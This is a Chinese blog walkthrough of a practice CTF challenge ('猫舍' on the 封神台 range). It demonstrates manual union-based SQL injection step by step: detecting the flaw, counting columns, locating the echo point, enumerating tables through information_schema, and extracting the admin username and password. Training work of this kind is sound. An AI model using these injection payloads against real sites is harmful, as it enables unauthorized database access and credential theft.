封神台——手工注入基础（猫舍）

阳光穿透心脏的1/2处 2023-02-22 13:51 11阅读 0赞

题目提示很明显，就是sql注入拿到管理员密码

![20200704105819258.png][]

点击传送门进入看到的是一个很简陋的猫舍页面

域名简单，没看到注入点[http://59.63.200.79:8003/][http_59.63.200.79_8003]

点击新闻页面看看

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70][]

域名后面加上了id=1，说明存在着数据库的交互

那么这里就很有可能是注入点

把这个作为我们的目标url[http://59.63.200.79:8003/?id=1][http_59.63.200.79_8003_id_1]

进入手工注入步骤

## 第一步 判断是否存在SQL注入漏洞 ##

构造and 1=1，这个语句是恒成立的，一般页面都是不报错的

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 1][]

再来试试1=2

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 2][]

出错，初步说明存在着注入漏洞

## 第二步 判断数据库字段数 ##

在这里会使用到order by()函数，它会根据后面的参数来改变排序顺序，比如数据库里有多个列，根据选取的列明，id,name，来排序

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 3][]

构造?id=1 and 1=1 order by 1 页面没有变化（order by 1表示根据第一列来排序，一般也是如此默认升序的）

再来依次构造order by 2 / order by 3

由MySQL的语法有，order by后面的数据超过列数后将会报错，因此用种方法来判断一共有几个字段

当进行到order by 3 后，页面显示错误，因此判断一共只有两个字段

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 4][]

## 第三步 判断回显点 ##

回显点就是在页面中能显示数据库信息的板块，比如有的网页中“浏览次数”“发布时间”等，都反应的是数据库中的数据

于是我们使用联合查询

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 5][]

我们同时查询这两个数据

但要注意的是，在MySQL语句中，页面一次只能显示一行查询的内容，而且是线差后显示，于是我们需要让前面的语句?id=1 and 1=1这句话失效，从而显示union select 1,2的内容

因此我们让前一个命令报错无法显示，即构造?id=1 and 1=2，后面照常union select 1,2

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 6][]

这样就完全没用

必须构造1=2

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 7][]

找到了回显点2

## 第四步 查询相关内容 ##

### 1.查询表 ###

已知2为回显点，我们只需要在联合查询时将2替代为我们想要查询到部位名称即可

可以查询当前的数据库名，将2替换为database()

构造id=1 and 1=2 union select 1,database()

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 8][]

数据库名为maoshe

查询当前数据库 表名

构造 ?id=1 and 1=2 union select 1,table\_name from information\_schema.tables where table\_schema=database() limit 0,1 回车

limit 0,1的意思是从0开始，查询第1个数据

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 9][]

查询到的数据库名为admin

查询limit 1,1看看，数据库名这样

![20200704113817427.png][]

2，1这样

![20200704113929206.png][]

3，1这样

![20200704114004267.png][]

4，1就空白了，说明一共就四张表

一般关于管理员的信息都在admin表中

### 2.查询字段名 ###

查询admin表的列名

构造 ?id=1 and 1=2 union select 1,column\_name from information\_schema.columns where table\_schema=database() and table\_name='admin' limit 0,1

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 10][]

第一列是id

?id=1 and 1=2 union select 1,column\_name from information\_schema.columns where table\_schema=database() and table\_name='admin' limit 1,1

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 11][]

第二列是username

?id=1 and 1=2 union select 1,column\_name from information\_schema.columns where table\_schema=database() and table\_name='admin' limit 2,1

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 12][]

第三列是password

该有的信息都找到了，直接查询就行了

### 3.查询字段内容 ###

构造 ?id=1 and 1=2 union select 1,username from admin limit 0,1 查询登陆用户名

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 13][]

构造 ?id=1 and 1=2 union select 1,password from admin limit 0,1查询密码

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 14][]

[20200704105819258.png]: https://img-blog.csdnimg.cn/20200704105819258.png
[http_59.63.200.79_8003]: http://59.63.200.79:8003/
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70]: https://img-blog.csdnimg.cn/20200704110005254.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[http_59.63.200.79_8003_id_1]: http://59.63.200.79:8003/?id=1
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 1]: https://img-blog.csdnimg.cn/20200704110513768.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 2]: https://img-blog.csdnimg.cn/20200704110642803.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 3]: https://img-blog.csdnimg.cn/20200704110843329.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 4]: https://img-blog.csdnimg.cn/20200704112203358.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 5]: https://img-blog.csdnimg.cn/2020070411245217.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 6]: https://img-blog.csdnimg.cn/20200704112909674.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 7]: https://img-blog.csdnimg.cn/20200704113025842.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 8]: https://img-blog.csdnimg.cn/20200704113303811.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 9]: https://img-blog.csdnimg.cn/20200704113734631.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[20200704113817427.png]: https://img-blog.csdnimg.cn/20200704113817427.png
[20200704113929206.png]: https://img-blog.csdnimg.cn/20200704113929206.png
[20200704114004267.png]: https://img-blog.csdnimg.cn/20200704114004267.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 10]: https://img-blog.csdnimg.cn/20200704114523884.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 11]: https://img-blog.csdnimg.cn/20200704114625678.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 12]: https://img-blog.csdnimg.cn/20200704114729651.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 13]: https://img-blog.csdnimg.cn/20200704115157896.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 14]: https://img-blog.csdnimg.cn/20200704115326542.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw==,size_16,color_FFFFFF,t_70